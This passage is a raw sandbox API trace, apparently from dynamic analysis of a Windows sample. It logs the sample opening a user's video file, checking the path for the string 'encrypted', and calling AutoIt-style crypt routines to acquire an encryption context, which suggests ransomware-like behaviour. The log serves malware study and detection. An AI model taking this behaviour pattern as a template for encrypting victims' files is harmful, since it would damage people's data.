[0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.767] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c8b0 [0041.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c8b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.768] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tvp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.768] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.768] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.769] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.769] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.769] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0041.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.769] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.769] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.769] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0041.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.769] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.770] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.770] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.770] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.770] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.770] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.770] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad128a0, ftCreationTime.dwHighDateTime=0x1d5b6cd, ftLastAccessTime.dwLowDateTime=0x78383e60, ftLastAccessTime.dwHighDateTime=0x1d5bd21, ftLastWriteTime.dwLowDateTime=0x78383e60, ftLastWriteTime.dwHighDateTime=0x1d5bd21, nFileSizeHigh=0x0, nFileSizeLow=0xb274, dwReserved0=0x0, dwReserved1=0x777648, cFileName="2TVP.avi", cAlternateFileName="")) returned 0x7c20c0 [0041.770] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.770] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad128a0, ftCreationTime.dwHighDateTime=0x1d5b6cd, ftLastAccessTime.dwLowDateTime=0x78383e60, ftLastAccessTime.dwHighDateTime=0x1d5bd21, ftLastWriteTime.dwLowDateTime=0x78383e60, ftLastWriteTime.dwHighDateTime=0x1d5bd21, nFileSizeHigh=0x0, nFileSizeLow=0xb274, dwReserved0=0x0, dwReserved1=0x777648, cFileName="2TVP.avi", cAlternateFileName="")) returned 0x7c20c0 [0041.770] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.771] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2TVP.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.772] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.772] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.772] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.772] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.772] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.772] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.772] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.772] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.772] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.772] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad128a0, ftCreationTime.dwHighDateTime=0x1d5b6cd, ftLastAccessTime.dwLowDateTime=0x78383e60, ftLastAccessTime.dwHighDateTime=0x1d5bd21, ftLastWriteTime.dwLowDateTime=0x78383e60, ftLastWriteTime.dwHighDateTime=0x1d5bd21, nFileSizeHigh=0x0, nFileSizeLow=0xb274, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="2TVP.avi", cAlternateFileName="")) returned 0x7c2100 [0041.773] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.773] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.773] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.773] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.773] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.773] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.773] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.773] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.773] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.773] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.773] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.773] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.773] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.773] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.773] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.773] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0041.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.774] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0041.774] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.774] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.774] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.775] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.775] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 